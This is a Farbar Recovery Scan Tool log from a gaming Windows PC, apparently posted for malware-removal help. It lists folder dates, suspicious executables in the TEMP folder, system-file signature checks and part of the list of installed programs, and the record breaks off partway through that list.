2014-10-06 19:53 - 2014-01-29 12:34 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Battle.net
2014-10-06 19:49 - 2013-02-21 16:22 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Apple Computer
2014-10-06 19:49 - 2013-02-01 20:09 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\ArmA 2 OA
2014-10-06 19:49 - 2013-02-01 08:14 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\ArmA 2
2014-10-06 19:49 - 2012-12-26 14:45 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\AMD
2014-10-06 19:48 - 2014-02-21 00:40 - 00000000 ____D () C:\Users\RaRWolf\Agency
2014-10-06 19:48 - 2013-02-22 22:08 - 00000000 ____D () C:\Users\RaRWolf\Adobe
2014-10-06 19:48 - 2013-02-08 12:56 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\AliensVsPredator
2014-10-06 19:43 - 2014-04-14 17:10 - 00000000 ____D () C:\Users\Public\Documents\S.T.A.L.K.E.R. - Call of Pripyat
2014-10-06 19:43 - 2013-10-12 20:13 - 00000000 ____D () C:\Users\RaRWolf\.minecraft
2014-10-06 19:42 - 2014-08-01 20:16 - 00000000 ____D () C:\ProgramData\RealNetworks
2014-10-06 19:42 - 2014-08-01 20:12 - 00000000 ____D () C:\ProgramData\Real
2014-10-06 19:42 - 2014-04-06 15:15 - 00000000 ____D () C:\ProgramData\Steam
2014-10-06 19:42 - 2013-10-28 16:47 - 00000000 ____D () C:\ProgramData\Razer
2014-10-06 19:42 - 2013-05-12 15:43 - 00000000 __SHD () C:\ProgramData\SecuROM
2014-10-06 19:39 - 2014-07-15 13:57 - 00000000 ____D () C:\ProgramData\Logishrd
2014-10-06 19:39 - 2013-10-26 22:40 - 00000000 ____D () C:\ProgramData\GFACE
2014-10-06 19:39 - 2013-08-14 16:48 - 00000000 ____D () C:\ProgramData\Origin
2014-10-06 19:38 - 2014-01-29 12:28 - 00000000 ____D () C:\ProgramData\Battle.net
2014-10-06 19:38 - 2013-08-16 11:27 - 00000000 __SHD () C:\ProgramData\DSS
2014-10-06 19:38 - 2013-06-11 20:32 - 00000000 ____D () C:\ProgramData\Desura
2014-10-06 19:38 - 2013-02-01 20:09 - 00000000 ____D () C:\ProgramData\Bohemia Interactive Studio
2014-10-03 23:44 - 2014-06-18 20:34 - 00000000 ____D () C:\Windows\C5C1C0F0D62F4DBF81D4D7EF397C228B.TMP
2014-10-03 19:22 - 2013-07-23 12:20 - 04920696 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-01 14:57 - 2013-09-02 21:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Malwarebytes
2014-10-01 14:57 - 2013-09-02 21:45 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-01 14:57 - 2013-09-02 21:45 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-09-28 16:08 - 2013-08-14 16:50 - 00000000 ____D () C:\Program Files (x86)\Origin Games
2014-09-27 14:20 - 2013-01-12 13:02 - 00348928 _____ () C:\Windows\SysWOW64\PnkBstrB.xtr
2014-09-27 14:20 - 2013-01-12 13:00 - 00348928 _____ () C:\Windows\SysWOW64\PnkBstrB.exe
2014-09-27 14:15 - 2013-01-12 13:00 - 00280904 _____ () C:\Windows\SysWOW64\PnkBstrB.ex0
2014-09-27 14:14 - 2013-08-14 16:48 - 00000000 ____D () C:\Program Files (x86)\Origin
2014-09-27 14:11 - 2013-08-20 12:24 - 00000000 ____D () C:\Program Files (x86)\Battlelog Web Plugins
 
Files to move or delete:
====================
C:\Users\RaRWolf\DispDiag-20140430-212535-4908-1032.dat
C:\Users\RaRWolf\worldpainter_1.7.1.exe
 
 
Some content of TEMP:
====================
C:\Users\RaRWolf\AppData\Local\Temp\0005029e.exe
C:\Users\RaRWolf\AppData\Local\Temp\00140da6.exe
C:\Users\RaRWolf\AppData\Local\Temp\02642ddf.exe
C:\Users\RaRWolf\AppData\Local\Temp\03362cda.exe
C:\Users\RaRWolf\AppData\Local\Temp\036c3d01.exe
C:\Users\RaRWolf\AppData\Local\Temp\bgdfcffc.exe
C:\Users\RaRWolf\AppData\Local\Temp\dllnt_dump.dll
C:\Users\RaRWolf\AppData\Local\Temp\obupdat.exe
C:\Users\RaRWolf\AppData\Local\Temp\tmp6EB8.exe
C:\Users\RaRWolf\AppData\Local\Temp\tmp6EC8.exe
C:\Users\RaRWolf\AppData\Local\Temp\UpdateFlashPlayer_f128d885.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-14 05:48
 
==================== End Of Log ============================
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 22-10-2014
Ran by RaRWolf at 2014-10-23 18:33:47
Running from C:\Users\RaRWolf\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKCU\...\uTorrent) (Version: 3.4.2.34309 - BitTorrent Inc.)
A Story About My Uncle (HKLM-x32\...\QVN0b3J5QWJvdXRNeVVuY2xl_is1) (Version: 1 - )
Ace of Spades (HKLM-x32\...\{580A2212-7116-46E6-9229-472E23F1DCC8}) (Version: 0.75.013 - Ben Aksoy)
Ace of Spades (HKLM-x32\...\Steam App 224540) (Version:  - )
Adobe After Effects CS6 (HKLM-x32\...\{4817D846-700B-474E-A31B-80892B3E92E3}) (Version: 11 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.6.0.5970 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.6.0.5970 - Adobe Systems Incorporated) Hidden
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.5 - Adobe Systems Incorporated)
Adobe Download Assistant (x32 Version: 1.2.5 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Help Manager (x32 Version: 4.0.244 - Adobe Systems Incorporated) Hidden
Adobe Reader X (10.1.3) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.3 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)
AI Suite II (HKLM-x32\...\{34D3688E-A737-44C5-9E2A-FF73618728E1}) (Version: 2.00.01 - ASUSTeK Computer Inc.)
AIMP3 (HKLM-x32\...\AIMP3) (Version: v3.55.1355, 14.07.2014 - AIMP DevTeam)
Alien Swarm (HKLM-x32\...\Steam App 630) (Version:  - Valve)
Ancient Weapon Sounds (HKLM-x32\...\{D91802D9-6A42-4563-BC37-B3E2D04DC95B}) (Version: 2.1.0 - Screaming Bee)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2F72F540-1F60-4266-9506-952B21D6640D}) (Version: 6.1.0.13 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Arma 3 (HKLM-x32\...\Steam App 107410) (Version:  - Bohemia Interactive)
Artemis Artemis (HKLM-x32\...\Artemis) (Version: 2.00.0 - Thom Robertson)
Assassin's Creed II (HKLM-x32\...\{8570BEE8-0CA3-4977-9AB1-80ED93F0513C}) (Version: 1.01 - Ubisoft)
Assassins Creed IV Black Flag (HKLM-x32\...\Uplay Install 273) (Version:  - Ubisoft)
Assassin's Creed Revelations (HKLM-x32\...\{33A22B2D-55BA-4508-B767-BF2E9C21A73F}) (Version: 1.00 - Ubisoft)
ASUS Ai Charger (HKLM-x32\...\{7FB64E72-9B0E-4460-A821-040C341E414A}) (Version: 1.03.00 - ASUSTeK Computer Inc.)
ASUS Easy Update (HKLM-x32\...\{E7AA854E-6756-424E-84C2-4E47D5729AFF}) (Version: 2.00.28 - ASUSTeK Computer Inc)
ASUS WebStorage Sync Agent (HKLM-x32\...\ASUS WebStorage) (Version: 1.1.3.105 - ASUS Cloud Corporation)
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.4126.52 - CyberLink Corp.)
ASUSDVD (x32 Version: 10.0.4126.52 - CyberLink Corp.) Hidden
Audacity 2.0.3 (HKLM-x32\...\Audacity_is1) (Version: 2.0.3 - Audacity Team)
Auto Clicker v1.3 (HKLM-x32\...\{C0A7E4F3-82CC-416B-82C6-BA06AACFD635}_is1) (Version: 1.3 - MurGee.com)
Autodesk SketchBook Pro 6.2.4 (HKLM-x32\...\{B882B2FC-D21E-4BCA-A173-4855757DE84A}) (Version: 6.24.0000 - Autodesk)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield 1942™ (HKLM-x32\...\{5BE7BD06-512B-43bf-AD78-3BD2A5F5F7B3}) (Version: 1.6.20.0 - Electronic Arts)
Battlefield 3™ (HKLM-x32\...\{76285C16-411A-488A-BCE3-C83CB933D8CF}) (Version: 1.6.0.0 - Electronic Arts)
Battlefront Extreme 2.2 (HKLM-x32\...\{AFD834CA-4579-49DF-9CF0-EA58822A7C2E}_is1) (Version:  - )
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.5.1 - EA Digital Illusions CE AB)
BattlEye for OA Uninstall (HKLM-x32\...\BattlEye for OA) (Version:  - )
BeamNG-Techdemo-0.3 (remove only) (HKCU\...\BeamNG-Techdemo-0.3) (Version:  - )
Bing Bar (HKLM-x32\...\{3365E735-48A6-4194-9988-CE59AC5AE503}) (Version: 7.3.132.0 - Microsoft Corporation)
Black Ink (HKLM-x32\...\Black Ink 0.151.1634) (Version: 0.151.1634 - Bleank)
Black Ink (x32 Version: 0.151.1634 - Bleank) Hidden
Blue Satin Skin (HKLM-x32\...\{B0C00181-ECF5-4124-A6DE-14EA663D4799}) (Version: 2.2.0 - Screaming Bee)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version:  - Gearbox Software)
Burnout Paradise: The Ultimate Box (HKLM-x32\...\Steam App 24740) (Version:  - Criterion Games)
Carmageddon EFLC 2.0.1.1 (HKLM-x32\...\Carmageddon EFLC 2.0.1.1) (Version:  - )
Carmageddon Mod version 3.0.0.0 (HKLM-x32\...\{8A1CC0C6-88DB-44C6-B259-9EA8EE1BA96C}_is1) (Version: 3.0.0.0 - GiphtWorks)
CCleaner (HKLM\...\CCleaner) (Version: 4.18 - Piriform)
Comic Sound Pack (HKLM-x32\...\{79A743FA-FF99-42DF-8C35-BA40EAEA6668}) (Version: 2.1.0 - Screaming Bee)
Contagion (HKLM-x32\...\Steam App 238430) (Version:  - Monochrome LLC)
Corel Painter 13 - IPM (Version: 13.0 - Corel Corporation) Hidden
Corel Painter 13 - IPM Content (Version: 13.0 - Corel Corporation) Hidden
Counter-Strike: Global Offensive - SDK (HKLM-x32\...\Steam App 745) (Version:  - )
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Creatures of Darkness (HKLM-x32\...\{5B616A3F-43D9-4F0B-9F49-D39342A98592}) (Version: 3.3.0 - Screaming Bee LLC)
Creeper World 3 (HKLM\...\{9FF369E0-0274-4715-A348-1A222857BFCD}_is1) (Version:  - Knuckle Cracker, LLC)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.47.1.0333 - Disc Soft Ltd)
Dead Space (HKLM-x32\...\Steam App 17470) (Version:  - EA Redwood Shores)
Deep Space Voices (HKLM-x32\...\{336E1A2D-E3EB-4846-B7D0-BD75BBBBC0A4}) (Version: 3.3.0 - Screaming Bee)
DEFCON (HKLM-x32\...\Steam App 1520) (Version:  - Introversion Software)
Dishonored (HKLM-x32\...\Steam App 205100) (Version: 1.0 - Bethesda Softworks)
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
Dungeonland (HKLM-x32\...\Steam App 218130) (Version:  - Critical Studio)
Dxtory version 2.0.119 (HKLM-x32\...\Dxtory2.0_is1) (Version: 2.0.119 - Dxtory Software)
eManual (HKLM-x32\...\{0C84E634-EB68-4A54-B21E-A05EC87A4CC5}) (Version: 1.00.00 - ASUSTeK Computer Inc.)
Explorer Suite IV (HKLM\...\Explorer Suite_is1) (Version:  - )
f.lux (HKCU\...\Flux) (Version:  - )
Factorio version 0.9.8 (HKLM\...\Factorio_is1) (Version:  - )
Fallout New Vegas  1.4 (HKLM-x32\...\Fallout New Vegas_is1) (Version: 1.4 - Bethesda Softworks)
Fantasy Sound Pack (HKLM-x32\...\{06ACD0D6-537A-4831-9608-AA74A5795698}) (Version: 1.1.0 - Screaming Bee)
Far Cry 3 Blood Dragon (HKLM-x32\...\Far Cry 3 Blood Dragon_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Far Cry® 3 (HKLM-x32\...\Steam App 220240) (Version:  - Ubisoft Montreal, Massive Entertainment, and Ubisoft Shanghai)
Farm Animal Sounds (HKLM-x32\...\{20052CA0-FF43-4901-8261-E6DBF0A09ED1}) (Version: 1.1.0 - Screaming Bee)
FileASSASSIN (HKLM-x32\...\FileASSASSIN) (Version: 1.06 - Malwarebytes)
Fistful of Frags (HKLM-x32\...\Steam App 265630) (Version:  - Fistful of Frags Team)
Floating Point (HKLM-x32\...\Steam App 302380) (Version:  - Suspicious Developments)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Free Screen Video Recorder version 2.5.30.725 (HKLM-x32\...\Free Screen Video Recorder_is1) (Version: 2.5.30.725 - DVDVideoSoft Ltd.)
Frozen Synapse (HKLM-x32\...\Steam App 98200) (Version:  - )
FTL version 1.01 (HKLM-x32\...\{20E23A40-38E5-4DD6-B738-BC8097AE66B6}_is1) (Version: 1.01 - Subset Games)
Galactic Voices (HKLM-x32\...\{DF3FE308-58F2-45E2-9BB0-6A993794AD5C}) (Version: 1.3.0 - Screaming Bee)
Galería de fotos (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Galerie de photos (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
GameMaker: Studio (HKLM-x32\...\Steam App 214850) (Version:  - YoYo Games Ltd.)
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version:  - Garry)
Ghost Recon Online (NCSA-Live) (HKCU\...\fc418bf9b18f76aa) (Version: 1.30.8665.2 - Ubisoft)
GoldenEye: Source (HKLM-x32\...\GoldenEye Source) (Version: 4.2.3 - Team GoldenEye: Source)
GoldenEye: Source (HKLM-x32\...\GoldenEye: Source) (Version: 4.2 - Team GoldenEye: Source)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.104 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Grand Theft Auto IV (HKLM-x32\...\Steam App 12210) (Version:  - Rockstar North)
Grand Theft Auto IV (x32 Version: 1.0.0013.131 - Rockstar Games Inc.) Hidden
Grand Theft Auto: Episodes from Liberty City (HKLM-x32\...\Steam App 12220) (Version:  - Rockstar North / Toronto)
Grand Theft Auto: Episodes from Liberty City (x32 Version: 1.0.0002.135 - Rockstar Games Inc.) Hidden
GTA San Andreas (HKLM-x32\...\{D417C96A-FCC7-4590-A1BB-FAF73F5BC98E}) (Version: 1.00.00001 - Rockstar Games)
Gunpoint (HKLM-x32\...\Steam App 206190) (Version:  - Suspicious Developments)
Guns of Icarus Online (HKLM-x32\...\Steam App 209080) (Version:  - Muse Games)
HexEdit (HKLM-x32\...\{083EF76E-0760-4D7A-9508-0B88A3AF1889}) (Version: 4.0.0 - Expert Commercial Software Pty Ltd)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Hitman Absolution (HKLM-x32\...\Hitman Absolution_is1) (Version:  - )
Hitman Blood Money (HKLM-x32\...\{A804B134-F03D-4EFD-9BC0-DCD257AA1B22}) (Version: 1.00.0000 - Eidos)
IconHandler 64 bit (Version: 2.0 - Corel Corporation) Hidden
Inform 7 (HKLM-x32\...\Inform 7) (Version:  - )
iTunes (HKLM\...\{0225AD21-F3E2-4916-BFF3-65D3F9052582}) (Version: 11.0.2.26 - Apple Inc.)
Jack Claw (HKLM-x32\...\Jack Claw_is1) (Version:  - Frozenbyte, Inc.)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217045FF}) (Version: 7.0.670 - Oracle)
Java Auto Updater (x32 Version: 2.1.67.1 - Oracle, Inc.) Hidden
Just Cause 2 (HKLM-x32\...\Steam App 8190) (Version:  - Avalanche)
Just Cause 2: Multiplayer Mod (HKLM-x32\...\Steam App 259080) (Version:  - JC2-MP Team)
Kits Configuration Installer (x32 Version: 8.100.25984 - Microsoft) Hidden
L.A. Noire (HKLM-x32\...\Steam App 110800) (Version:  - Team Bondi)
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version:  - Valve)
Left 4 Dead 2 Authoring Tools (HKLM-x32\...\Steam App 563) (Version:  - Valve)
Left 4 Dead 2 Beta (HKLM-x32\...\Steam App 223530) (Version:  - )
Logitech SetPoint 6.65 (HKLM\...\sp6) (Version: 6.65.62 - Logitech)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.236 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.236 - LogMeIn, Inc.) Hidden
Magicite (HKLM-x32\...\Steam App 268750) (Version:  - SmashGames)
Magicka (HKLM-x32\...\Steam App 42910) (Version:  - Arrowhead Game Studios AB)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Mass Effect - Unification version 1.12 (HKLM-x32\...\{2CD83494-75D3-457B-A9EA-164377B56443}_is1) (Version: 1.12 - Frayed Wires Studios)
Mass Effect (HKLM-x32\...\{1B0FBB9A-995D-47cd-87CD-13E68B676E4F}) (Version: 1.00 - Electronic Arts, Inc.)
Mass Effect 2 (HKLM-x32\...\{75D84EF7-0D8C-4e70-B3FA-7B42A5D4E0EB}) (Version: 1.02 - Electronic Arts, Inc.)
Mass Effect™ 3 (HKLM-x32\...\{6A9D1594-7791-48f5-9CAA-DE9BCB968320}) (Version: 1.01.0.0 - Electronic Arts)
Men of War: Assault Squad (HKLM-x32\...\Steam App 64000) (Version:  - Digitalmindsoft)
Men of War: Red Tide (HKLM-x32\...\Steam App 3130) (Version:  - 1C Company)
Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft Chart Controls for Microsoft .NET Framework 3.5 (HKLM-x32\...\{41785C66-90F2-40CE-8CB5-1C94BFC97280}) (Version: 3.5.0.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{42AA4CA8-DCD8-4308-BCAB-0B6D75856A9D}) (Version: 3.5.95.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft Motocross Madness 2 (HKLM-x32\...\Motocross Madness 2) (Version:  - )
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Middle-earth: Shadow of Mordor (HKLM-x32\...\Steam App 241930) (Version:  - Monolith Productions, Inc.)
Modern Combat (HKLM-x32\...\Modern Combat 1.015) (Version: 1.015 - BSS Modern Combat Dev Team)
Modern Combat (x32 Version: 1.015 - BSS Modern Combat Dev Team) Hidden
MorphVOX Pro (HKLM-x32\...\{DE289787-7ECA-4BED-9D8C-99FAC407E3D6}) (Version: 4.3.13 - Screaming Bee)
Morrowind (HKLM-x32\...\{C325F588-D6B1-4A7F-B6A2-914C75DDA348}) (Version:  - )
Movie Maker (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Mozilla Firefox 29.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 29.0.1 (x86 en-US)) (Version: 29.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSI Afterburner 2.3.1 (HKLM-x32\...\Afterburner) (Version: 2.3.1 - MSI Co., LTD)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1108.0727 - Microsoft) Hidden
Multiwinia (HKLM-x32\...\Steam App 1530) (Version:  - Introversion Software)
Natural Selection 2 (HKLM-x32\...\Steam App 4920) (Version:  - Unknown Worlds Entertainment)
Nero 12 Essentials OEM.a01 (HKLM-x32\...\{2AC099EA-CC1C-4E4E-BDFC-0353DCF13DD0}) (Version: 12.5.00400 - Nero AG)
Nero ControlCenter (x32 Version: 11.0.15200 - Nero AG) Hidden
Nero ControlCenter Help (CHM) (x32 Version: 12.0.0003 - Nero AG) Hidden
Nero Core Components (x32 Version: 11.0.17800 - Nero AG) Hidden
Nero Express (x32 Version: 12.0.19000 - Nero AG) Hidden
Nero Express Help (CHM) (x32 Version: 12.0.1000 - Nero AG) Hidden
Nero Launcher (x32 Version: 12.2.2000 - Nero AG) Hidden
Nero Update (x32 Version: 11.0.11800.31.0 - Nero AG) Hidden
Next Car Game Technology Sneak Peek 2.0 (HKLM-x32\...\Next Car Game Technology Sneak Peek) (Version:  - Bugbear Entertainment)
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.52.1 - Black Tree Gaming)
Nidhogg (HKLM-x32\...\Steam App 94400) (Version:  - Messhof)
No More Room in Hell (HKLM-x32\...\Steam App 224260) (Version:  - No More Room in Hell Team)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6 - Notepad++ Team)
NVIDIA 3D Vision Controller Driver 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 337.88 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 337.88 - NVIDIA Corporation)
NVIDIA Control Panel 337.88 (Version: 337.88 - NVIDIA Corporation) Hidden
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 337.88 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
NVIDIA Install Application (Version: 2.1002.157.1165 - NVIDIA Corporation) Hidden
NVIDIA LED Visualizer 1.0 (Version: 1.0 - NVIDIA Corporation) Hidden
NVIDIA Network Service (Version: 1.0 - NVIDIA Corporation) Hidden
NVIDIA PhysX (x32 Version: 9.13.1220 - NVIDIA Corporation) Hidden
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
NVIDIA ShadowPlay 15.3.33 (Version: 15.3.33 - NVIDIA Corporation) Hidden
NVIDIA Stereoscopic 3D Driver (x32 Version: 7.17.12.6514 - NVIDIA Corporation) Hidden
NVIDIA Update 15.3.33 (Version: 15.3.33 - NVIDIA Corporation) Hidden
NVIDIA Update Core (Version: 15.3.33 - NVIDIA Corporation) Hidden
NVIDIA Virtual Audio 1.2.23 (Version: 1.2.23 - NVIDIA Corporation) Hidden
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
